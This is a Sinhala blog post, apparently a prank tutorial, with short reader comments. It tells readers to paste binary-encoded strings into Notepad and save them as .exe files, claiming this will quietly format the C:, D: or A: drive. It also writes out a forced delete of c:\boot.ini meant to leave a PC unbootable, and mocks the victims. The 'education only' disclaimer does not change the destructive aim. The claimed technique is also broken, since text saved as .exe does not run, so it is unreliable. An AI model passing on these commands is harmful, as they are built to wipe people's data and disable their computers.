(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)
මේ වැඩේ කරන්න එච්චර ලොකු දැනුමක් ඕනි නෑ. කරන්න ඕනි මං කියල දීලා තියෙන දේවල් හරියටම කරන එක.
01.මුලින්ම Notepad එක Open කරගන්න දන්නැත්තම් මෙහෙම යන්න. Start-Allprogarm-Accessories-Notepad
02.දැන් මං පහලින් දාලා තියෙන Code ටික Notepad එකට Copy/past කරන්න.
03.අන්තිමට .exe කියලා ගහන්න ඕනි.doiyababa කියන තැනට ඕයාලා කැමති නමක් දාගෙන Save කරගන්න.
01.මේ code එකෙන් කිසි ගින්නක් නැතුව c: drive එක Format වෙනවා.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
02.මේකෙන් D: එක Format වෙනවා.
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
03.මේකෙන් A: එක Format වෙනවා.
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
හරි මෙ උඩ තියන coad ටික copy කර past කරන්න Notepad එකේ,ඒ වගෙම saveකර ගන්න .exe කියලා,
උදා-doiyababa.exe
මේකෙන් වෙන්නේ කෙලින්ම del /F/S/Q c:\boot.ini මේකෙන් boot.ini එක මැකෙනවා.ඊට පස්සෙ තේරෙනවනේ කියන්න ඕනි නෑනෙ,
එතකොට PC එක boot වෙන්නේ නැතිව යනවා.එතකොට දානයක් දෙන්න ලෑස්ති වෙලා හිටපල්ලා...හික්ස්....
(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)
Boot ini delete unoth. Hiren's boot cd software eken hadanna puluwan bro😃😃😃😄...eke thwa patta wada thiyenawa...
ReplyDeleteFormat wena widiya nam hodai
Bari wela hari ,waradila pen ,chip ,hard drive format unoth..icare data reovery ,easus , get data go back walin ganna puluwan..